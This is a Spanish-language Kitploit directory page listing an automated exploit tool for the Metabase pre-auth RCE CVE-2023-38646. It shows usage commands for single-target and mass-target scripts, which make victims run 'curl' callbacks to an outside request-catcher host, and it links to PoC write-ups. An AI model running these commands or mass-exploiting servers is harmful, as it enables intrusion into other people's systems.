Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-38646 — Herramientas Automáticas Para El Exploit De Metabase Conocido Como CVE-2023-38646 | Kitploit
Herramientas/GitHubGitHub/robotmikhro/cve-2023-38646
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y Control
GitHubrobotmikhro/cve-2023-38646

CVE-2023-38646

Herramientas Automáticas Para El Exploit De Metabase Conocido Como CVE-2023-38646

Ver Repositorio
2762hace 3 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-38646

Herramientas automáticas para el exploit RCE de Metabase conocido como CVE-2023-38646. Lee https://secry.me/explore/news/metabase-rce-cve-2023-38646/ para más información (POC, Dork)

Cómo usar single.py

CVE-2023-38646-Single Exploit

root@kitploit:~
python3 single.py --url=http://127.0.0.1:8080 --command="curl sub.requestcatcher.com/some-endpoint"

o

root@kitploit:~
python3 single.py -u http://127.0.0.1:8080 -c "curl sub.requestcatcher.com/some-endpoint"

Cómo usar mass.py

CVE-2023-38646-Mass Exploit

root@kitploit:~
python3 mass.py -f target.txt -t 10 -c "curl sub.requestcatcher.com/some-endpoint" -o output.txt

o

root@kitploit:~
python3 mass.py --file=target.txt --threads=10 --command="curl sub.requestcatcher.com/some-endpoint" --output="output.txt"

POC de referencia

  • https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/
  • https://blog.calif.io/p/reproducing-cve-2023-38646-metabase
  • https://www.metabase.com/blog/security-advisory
  • Twitter
Descargar herramienta